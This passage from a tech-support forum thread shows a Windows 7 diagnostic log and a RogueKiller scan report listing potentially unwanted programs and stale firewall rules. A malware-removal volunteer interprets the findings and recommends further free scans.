FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
18-11-2019 19:29:54 Removed Nero 8. Available with Windows Installer version 1.2 and later.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
 
System errors:
=============
Error: (11/19/2019 03:29:16 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/19/2019 03:23:27 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/19/2019 03:23:27 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/19/2019 03:12:50 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Error Reporting Service service to connect.
 
Error: (11/19/2019 02:52:45 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-19 15:26:48.206
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 15:20:24.280
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 15:05:21.873
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 15:00:01.558
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 14:48:29.683
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 79%
Total physical RAM: 3447.63 MB
Available physical RAM: 709.1 MB
Total Virtual: 6893.39 MB
Available Virtual: 3823.54 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:37.81 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:205.66 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================

  • 0

#13
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

See if you can get rogue killer to run:

 

Rogue Killer

http://www.adlice.co...iller/#download

Portable 64 bits <==Use this one

Download and Save.



Right click on the downloaded file (RogueKillerX64.exe or RogueKiller.exe)  and Run As admin

Start Scan
Start Scan

Will take about 20 minutes to complete.

Open Report
Export TXT (save it to your desktop as rk) Save

Do not let Rogue Killer remove anything until you hear from me.  Leave Rogue Killer up (but minimized) so you won't have to rescan.

Open rk.txt and copy and paste it to your next Reply.
 


  • 0

#14
vladana_91

vladana_91

    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Copy of rk.txt:

 

RogueKiller Anti-Malware V13.5.6.0 (x64) [Nov  7 2019] (Free) by Adlice Software
Operating System : Windows 7 (6.1.7600) 64 bits
Started in : Normal mode
User : Vladana [Administrator]
Started from : D:\Vladana #4\Programs\Azureus\Downloaded\RogueKiller_portable64.exe
Signatures : 20191119_104519, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/11/19 19:58:30 (Duration : 00:56:05)
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Gen1|PUP.Popcorn (Potentially Malicious)] Updater.exe (3620) -- C:\Program Files (x86)\Popcorn Time\Updater.exe -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> XX - Software
  [PUP.Reimage|PUP.Gen1 (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\Software\Reimage -- N/A -> Found
  [PUP.Popcorn (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\Popcorn Time -- N/A -> Found
  [PUP.Popcorn (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\PopcornTime -- N/A -> Found
  [PUP.Gen1 (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\Softonic -- N/A -> Found
  [PUP.Gen1 (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\WebApp -- N/A -> Found
>>>>>> O23 - Services
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Update service -- "C:\Program Files (x86)\Popcorn Time\Updater.exe" -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Update service -- "C:\Program Files (x86)\Popcorn Time\Updater.exe" -> Found
>>>>>> O87 - Firewall
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{787EA532-6389-4D57-8CB4-56ED49F60E38} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{F0F6824E-F9E8-401C-92A1-52EE1D31841E} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{DE2D1B1A-A95A-4427-8BD7-97016C528F99} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{023EC48C-AAA6-4832-8DEF-E77068991D61} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe|Name=AndySetupOut| (C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2F79B4C8-3AFC-4E30-B1B2-EE4203877302} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveInTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{FEE98E1E-A352-4C6D-A55F-F641B4E69F55} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveOutTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9E97B312-F759-4491-9B4A-9A7F7BD66B49} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3B74B220-3059-4A75-949E-50972E487A28} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{187F27A2-9AE2-489B-B927-B8FC03CC268B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A9130200-545F-467A-9A36-1B798C073847} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5DEA6D27-54CF-4606-949E-BD3C17E5B786} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{787EA532-6389-4D57-8CB4-56ED49F60E38} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{F0F6824E-F9E8-401C-92A1-52EE1D31841E} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{DE2D1B1A-A95A-4427-8BD7-97016C528F99} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{023EC48C-AAA6-4832-8DEF-E77068991D61} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe|Name=AndySetupOut| (C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2F79B4C8-3AFC-4E30-B1B2-EE4203877302} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveInTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{FEE98E1E-A352-4C6D-A55F-F641B4E69F55} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveOutTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9E97B312-F759-4491-9B4A-9A7F7BD66B49} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3B74B220-3059-4A75-949E-50972E487A28} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{187F27A2-9AE2-489B-B927-B8FC03CC268B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A9130200-545F-467A-9A36-1B798C073847} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5DEA6D27-54CF-4606-949E-BD3C17E5B786} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
>>>>>> XX - System Policies
  [PUM.Policies (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System|ConsentPromptBehaviorAdmin -- 0 -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Popcorn (Potentially Malicious)] (folder) PopcornTimeDesktop -- C:\Users\Vladana\AppData\Local\PopcornTimeDesktop -> Found
[Adw.HotspotShield (Malicious)] (folder) Hotspot Shield -- C:\ProgramData\Hotspot Shield -> Found
[PUP.InstallPack (Potentially Malicious)] (folder) InstallMate -- C:\ProgramData\InstallMate -> Found
[PUP.Gen1 (Potentially Malicious)] (folder) SoftSafe -- C:\ProgramData\SoftSafe -> Found
[PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (folder) Popcorn Time -- C:\Program Files (x86)\Popcorn Time -> Found
[PUP.Gen1 (Potentially Malicious)] (folder) WebSearch -- C:\Program Files (x86)\WebSearch -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

  • 0

#15
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Sorry for the dealy.  Just got up from a nap.

 

It doesn't look like it found anything really nasty.  As far as I  know Popcorn Time is not really that bad.  If you want to keep it (uncheck the lines that mention  it)  that's OK.  Won't hurt to let it remove the other stuff it found.  The missing files in the firewall list stuff is just left from when you uninstalled something and it didn't patch the firewall.  I can see that in FRST but it was too much trouble to put them in a fixlist.  Might as well let RK remove them.

 

Wife says we have to go to a meeting now.  See if you can run ESET's free scanner:

 

https://www.eset.com...online-scanner/

 

Click on Free One Time Scan and follow the instructions.  May take a few hours to complete.


  • 0






Similar Topics


Also tagged with one or more of these keywords: security, avast, Malwarebytes, windows 7, win7, virus, Malware

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP